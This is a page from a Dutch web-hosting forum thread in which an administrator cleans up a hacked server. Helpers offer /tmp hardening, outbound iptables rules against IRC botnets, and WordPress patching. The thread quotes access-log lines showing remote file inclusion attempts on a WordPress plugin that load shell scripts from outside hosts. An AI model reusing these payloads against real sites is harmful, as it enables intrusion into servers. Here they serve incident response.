Likes Likes:  0
Resultaten 16 tot 30 van de 32
Pagina 2 van de 3 Eerste 1 2 3 LaatsteLaatste
Geen

Onderwerp: Server gehacht !!

  1. #16
    Server gehacht !!
    geregistreerd gebruiker
    455 Berichten
    Ingeschreven
    29/08/06

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door Armando23 Bekijk Berichten
    het zit hem in de map /tmp

    ik heb het volgende uitgevoerd wat ik ergens heb gelezen tegen kwaadwillige gebruikers:\

    #!/bin/sh
    dd if=/dev/zero of=/tmp.bin bs=1M count=1000
    mkfs.ext3 /tmp.bin -F
    mv /tmp /tmp.old
    mv /usr/tmp /usr/tmp.old
    mv /var/tmp /var/tmp.old
    mkdir /tmp
    mount /tmp.bin /tmp -o noexec,nosuid,rw,loop
    ln -s /tmp /usr/tmp
    ln -s /tmp /var/tmp
    chmod 777 /tmp
    chmod 777 /usr/tmp
    chmod 777 /var/tmp
    echo "/tmp.bin /tmp ext3 noexec,nosuid,rw,loop 0 0" >> /etc/fstab
    ja dank je, had ik dus in je andere topic gepost
    als ik de iptables aanpas dan staat er

    iptables v1.3.0: invalid port/service `' specified
    Try `iptables -h' or 'iptables --help' for more information.
    typfoutje, even regel voor regel proberen uit te voeren om zo op te zoeken op welke hij stuk gaat.

    [root@centralnexus tmp]# grep 'perl' /var/www/vhosts/*/statistics/logs/access_log
    /var/www/vhosts/purestas.com/statistics/logs/access_log:203.157.172.2 - - [08/May/2007:04:45:08 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shellbr.xpg.com.br/cmd.txt? HTTP/1.1" 200 11584 "-" "libwww-perl/5.79"
    /var/www/vhosts/purestas.com/statistics/logs/access_log:80.6.95.5 - - [08/May/2007:06:07:24 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pnp21.co.kr/bbs/data/.xpl/cmd.gif? HTTP/1.1" 200 11584 "-" "libwww-perl/5.805"
    /var/www/vhosts/purestas.com/statistics/logs/access_log:81.7.87.251 - - [08/May/2007:09:18:00 +0200] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.prancuzai-mopsai.lt/eval.txt? HTTP/1.1" 200 514 "-" "libwww-perl/5.65"
    /var/www/vhosts/purestas.com/statistics/logs/access_log:84.16.242.71 - - [08/May/2007:10:46:41 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pronext.eu/help/a.txt? HTTP/1.1" 200 496 "-" "libwww-perl/5.805"
    /var/www/vhosts/purestas.com/statistics/logs/access_log:201.41.100.226 - - [08/May/2007:11:19:47 +0200] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://perdu.ch/cgi-bin/echo? HTTP/1.1" 200 498 "-" "libwww-perl/5.65"
    /var/www/vhosts/purestas.com/statistics/logs/access_log:216.104.33.30 - - [08/May/2007:11:45:20 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pnp21.co.kr/bbs/data/.xpl/os? HTTP/1.1" 200 319 "-" "libwww-perl/5.805"
    /var/www/vhosts/purestas.com/statistics/logs/access_log:85.10.128.239 - - [08/May/2007:12:18:48 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sanwall.info/echo.txt? HTTP/1.1" 200 500 "-" "libwww-perl/5.803"
    [root@centralnexus tmp]#
    wow, dit is die nieuwe WP sploit die ze misbruikt hebben lijp
    http://www.milw0rm.com/exploits/3825

    kortom, iemand op je server heeft een lekke wordpress, en doordat de tmp mappen +x hebben/hadden kon er malicious code uitgevoerd worden.

  2. #17
    Server gehacht !!
    geregistreerd gebruiker
    99 Berichten
    Ingeschreven
    13/07/06

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    Citaat Oorspronkelijk geplaatst door smurf Bekijk Berichten
    iptables -I OUTPUT -p tcp -m multiport --destination-ports 3131,6660,6661,6662,6663,6664,6665,6666,6667,6668, 6669,7000 -j DROP

    is in één lijn, forum maakt er 2 van

    Om die exploit tegen te gaan:

    url_fopen uitschakelen in php.ini (kan wel dat een hoop scripts dan niet meer werken)
    die module updaten
    mod_sec regel aanmaken tegen die exploit

    Run eens een rootkitcheck (kan je in plesk onder watchdog) om zeker te zijn dat er niet meer loos is.

    ik heb het als 1 lijn uitgevoerd maar hij blijft het zeggen :

    [root@centralnexus ~]# iptables -I OUTPUT -p tcp -m multiport --destination-ports 3131,6660,6661,6662,6663,6664,6665,6666,6667,6668, 6669,7000 -j DROP
    iptables v1.3.0: invalid port/service `' specified
    Try `iptables -h' or 'iptables --help' for more information.

    ik heb de rootkit meerdere keren uitgevoerd maar alles draait als een zonnetje volgens de rootkit ... zijn er nog andere scanners die ik kan uitvoeren ??

    echt onwijs bedankt voor alle tips enzo !

    Citaat Oorspronkelijk geplaatst door nzyme Bekijk Berichten
    ja dank je, had ik dus in je andere topic gepost

    typfoutje, even regel voor regel proberen uit te voeren om zo op te zoeken op welke hij stuk gaat.



    wow, dit is die nieuwe WP sploit die ze misbruikt hebben lijp
    http://www.milw0rm.com/exploits/3825

    kortom, iemand op je server heeft een lekke wordpress, en doordat de tmp mappen +x hebben/hadden kon er malicious code uitgevoerd worden.
    wat kan ik nu het beste doen om hier vanaf te komen ??
    Laatst gewijzigd door Armando23; 08/05/07 om 13:02. Reden: Automerged Dubbelpost

  3. #18
    Server gehacht !!
    geregistreerd gebruiker
    455 Berichten
    Ingeschreven
    29/08/06

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    mjah waarom niet gewoon een firewall als dit:

    Code:
    iptables -P INPUT DROP
    iptables -P OUTPUT DROP
    iptables -A INPUT -p tcp --dport 80 -j ACCEPT
    iptables -A OUTPUT -p tcp --sport 80 -j ACCEPT
    en dat even afgaan voor al je diensten

    of toch:
    Code:
    iptables -I OUTPUT -p tcp --dport 3131,6660,6661,6662,6663,6664,6665,6666,6667,6668,6669,7000 -j DROP
    edit: hij gaat stuk op al die komma's :/

  4. #19
    Server gehacht !!
    geregistreerd gebruiker
    99 Berichten
    Ingeschreven
    13/07/06

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    ik zie dat voor die kwaadaardige code registerglobals op on moet staan maar die staat standaard uit nbij mij

    Citaat Oorspronkelijk geplaatst door nzyme Bekijk Berichten
    ja dank je, had ik dus in je andere topic gepost

    typfoutje, even regel voor regel proberen uit te voeren om zo op te zoeken op welke hij stuk gaat.



    wow, dit is die nieuwe WP sploit die ze misbruikt hebben lijp
    http://www.milw0rm.com/exploits/3825

    kortom, iemand op je server heeft een lekke wordpress, en doordat de tmp mappen +x hebben/hadden kon er malicious code uitgevoerd worden.
    maar kan dat nu niet meere dan ? hoe weet ik dat het nu voorbij is zeg maar ??

    het duurt trouwens ook erg lang als ik via ssh inlog ... hoij vraagt dan wel snel om login as: en het wchtwoord ... maar nadat ik het wachtwoord heb gegeven ... duurt het zo 30 sec. voordat ik erin lkan .... heeft dit er iets mee te maken ?????
    Laatst gewijzigd door Armando23; 08/05/07 om 13:19. Reden: Automerged Dubbelpost

  5. #20
    Server gehacht !!
    VoipQ
    1.298 Berichten
    Ingeschreven
    26/07/05

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Ryan Kalkhoven
    Bedrijf: VoipQ
    Registrar SIDN: Nee
    KvK nummer: 27183560
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door Armando23 Bekijk Berichten
    ik zie dat voor die kwaadaardige code registerglobals op on moet staan maar die staat standaard uit nbij mij
    Ook al staat hij op on in Plesk dan kunnen er nog direct in de config wat aanpassingen zijn gedaan waardoor die lekken ontstaan.
    Zakelijke telefonie met de voordelen van voip? Kijk eens op: http://www.voipq.nl

  6. #21
    Server gehacht !!
    geregistreerd gebruiker
    99 Berichten
    Ingeschreven
    13/07/06

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    ok maar moet ik nogt wat doen om zeker te zijn dat het nu allemaal goed is ?

  7. #22
    Server gehacht !!
    VoipQ
    1.298 Berichten
    Ingeschreven
    26/07/05

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Ryan Kalkhoven
    Bedrijf: VoipQ
    Registrar SIDN: Nee
    KvK nummer: 27183560
    Ondernemingsnummer: nvt

    Naast het op non-actief stellen, zal je uit moeten zoeken welke scripts (standaard CMSen en andere opensource pakketten) er allemaal lek zijn, waar de indringer zijn scripts heeft neergezet en welke aanpassingen er nog meer zijn gedaan op het systeem.

    Als je dat weet kun je de problemen oplossen en gaan voorkomen
    Zakelijke telefonie met de voordelen van voip? Kijk eens op: http://www.voipq.nl

  8. #23
    Server gehacht !!
    geregistreerd gebruiker
    455 Berichten
    Ingeschreven
    29/08/06

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    die klant op suspended zetten tot die ge-update heeft en je tmp mappen beveiligen. Thats it...

  9. #24
    Server gehacht !!
    Banned
    177 Berichten
    Ingeschreven
    10/03/07

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: ja
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    De map .ICE-unix is toch voor de grafische linux?

    Verder idd /tmp/ beveiligen.
    Verder WordPress updaten. (ik neem al dat ze een patch/update hebben uitgebracht)

    Citaat Oorspronkelijk geplaatst door nzyme Bekijk Berichten
    mjah waarom niet gewoon een firewall als dit:
    Code:
    iptables -P INPUT DROP
    iptables -P OUTPUT DROP
    iptables -A INPUT -p tcp --dport 80 -j ACCEPT
    iptables -A OUTPUT -p tcp --sport 80 -j ACCEPT
    Werken SSH/POP3/IMAP/SMTP/FTP e.d. nog dan?

  10. #25
    Server gehacht !!
    VoipQ
    1.298 Berichten
    Ingeschreven
    26/07/05

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Ryan Kalkhoven
    Bedrijf: VoipQ
    Registrar SIDN: Nee
    KvK nummer: 27183560
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door blackberry Bekijk Berichten
    Werken SSH/POP3/IMAP/SMTP/FTP e.d. nog dan?
    Hij geeft aan dat je al je openstaande poorten moet doorlopen om te zien welke je nog meer wil open zetten, of wil loggen bij benadering
    Zakelijke telefonie met de voordelen van voip? Kijk eens op: http://www.voipq.nl

  11. #26
    Server gehacht !!
    geregistreerd gebruiker
    99 Berichten
    Ingeschreven
    13/07/06

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    Citaat Oorspronkelijk geplaatst door blackberry Bekijk Berichten
    De map .ICE-unix is toch voor de grafische linux?

    Verder idd /tmp/ beveiligen.
    Verder WordPress updaten. (ik neem al dat ze een patch/update hebben uitgebracht)

    Werken SSH/POP3/IMAP/SMTP/FTP e.d. nog dan?
    hoe kan ik nog meer me map /tmp beveiligen dan ??

    is er iemand die (tegen betaling) mn server wil bekijken of het allemaal goe dis zo ??

  12. #27
    Server gehacht !!
    VoipQ
    1.298 Berichten
    Ingeschreven
    26/07/05

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Ryan Kalkhoven
    Bedrijf: VoipQ
    Registrar SIDN: Nee
    KvK nummer: 27183560
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door ByteMe
    Sorry, maar een titel 'server gehacked' deed mij die richting denken aangezien hij de processen ook niet gekilled kreeg. 'En je hebt toch waarsch toch meerdere ip's? Just my two cents
    Als je een server uitzet dan heb je weinig aan extra ip's.....
    Zakelijke telefonie met de voordelen van voip? Kijk eens op: http://www.voipq.nl

  13. #28
    Server gehacht !!
    Banned
    177 Berichten
    Ingeschreven
    10/03/07

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: ja
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door Ryan Kalkhoven Bekijk Berichten
    Als je een server uitzet dan heb je weinig aan extra ip's.....
    Hmm,, volgens mij heb je ook niet zoveel aan de extra ip's, of je mag de ip's gaan omnummeren (hoeft niet veel werk te zijn, alhoewel, moet wel 's nachts gebeuren). Maar dat zal waarschijnlijk geen eens invloed hebben. Het gaat hier niet om een DDOS op een IP oid. De wordpress-exploit gaat zelfs via de hostname, deze zal dan mooi direct naar het nieuwe ip resolven.

  14. #29
    Server gehacht !!
    geregistreerd gebruiker
    99 Berichten
    Ingeschreven
    13/07/06

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    ik vind het zo raar he ... als ik in wil loggen via ssh is het zo traag ... voordat ik commandos in kan voeren ... en mail verzenden via smtp gaat ook niet echt snel, hij heeft dan wel verbinding want er staat verbonden mar hij gaat pas door na 10 sec. zelfde als bij ssh ... zou dit er mee te maken kunnen hebben ?? is het niet zo dat ze gebruikersaccount hebben kunen aangemaakt op mn server ? of een andere backdoor geinstalleerd ? ik heb via plesk firewall alle andere poorten dichtgegooit volgens mij nu ...

  15. #30
    Server gehacht !!
    VoipQ
    1.298 Berichten
    Ingeschreven
    26/07/05

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Ryan Kalkhoven
    Bedrijf: VoipQ
    Registrar SIDN: Nee
    KvK nummer: 27183560
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door blackberry Bekijk Berichten
    Hmm,, volgens mij heb je ook niet zoveel aan de extra ip's, of je mag de ip's gaan omnummeren (hoeft niet veel werk te zijn, alhoewel, moet wel 's nachts gebeuren). Maar dat zal waarschijnlijk geen eens invloed hebben. Het gaat hier niet om een DDOS op een IP oid. De wordpress-exploit gaat zelfs via de hostname, deze zal dan mooi direct naar het nieuwe ip resolven.
    Deze gekraakte servers staan vaak in contact met een botnet welke werkt via IRC.... Die vebinden vanaf de server en die maakt zich niet druk om een ander IP.
    Ik vond het even belangrijk om een antwoord te geven op die opmerking aangezien dat geen oplossing is, voordat onwetende dergelijke dingen doen en nog verder in de problemen komen....
    Zakelijke telefonie met de voordelen van voip? Kijk eens op: http://www.voipq.nl

Pagina 2 van de 3 Eerste 1 2 3 LaatsteLaatste

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics